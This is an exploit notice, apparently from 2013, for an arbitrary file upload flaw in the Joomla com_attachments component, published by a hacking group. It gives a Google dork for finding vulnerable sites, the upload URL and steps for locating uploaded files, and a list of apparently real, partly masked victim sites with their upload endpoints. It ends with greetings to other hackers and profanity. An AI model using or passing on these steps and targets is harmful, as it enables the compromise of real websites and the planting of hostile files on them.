################################################ # Exploit Title: Joomla Com_Attachments Component Arbitrary File Upload Vulnerability # Google Dork: inurl:"index.php?option=com_attachments" # Date: 2013-07-09 # Exploit Author: Stars Hacking Team # We Are: S3Ri0uS , Satanic2000 , NuLLeRRoR , Mohamadpk , blackc0der # Email: Z3ro.Day@Hotmail.Com , Ste4ler_Mind@Yahoo.Com , Mr.Satanic2000@Rogers.Com # Vendor Homepage: http://joomla.org # Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/downloads/3115 # Tested on: Lin ################################################ # ~> ExpLoit <~ # # http://target/index.php?option=com_attachments&task=upload # # 1. Upload Your File . ! # 2. Find Your File in This Path: # http://target/attachments/article # 3. End :P # ############################################ # ~> DeMo <~ # http://www.iwalkforXlife.com/index.php?option=com_attachments&task=upload # http://www.iwalkXforlife.com/attachments/article/0/stars.jpg # ---- # http://www.lgbXsychology2013.com/index.php/en/?option=com_attachments&task=upload # http://www.saiXs-club.net/index.php?option=com_attachments&task=upload # http://www.projXt-establis.eu/index.php?option=com_attachments&task=upload ############################################ # Spt : Pejv4k , Skitt3r , Netw0rm , HUrr!c4nE , Kinglet , Skipp3r , AG , Amo Vahid , Ahmadbady , XzadX # iskorpitx , HellBoy , Cyber-Terrorist And All My Best Friend :X # Fuck All Lammer in Cyber :P ###########################################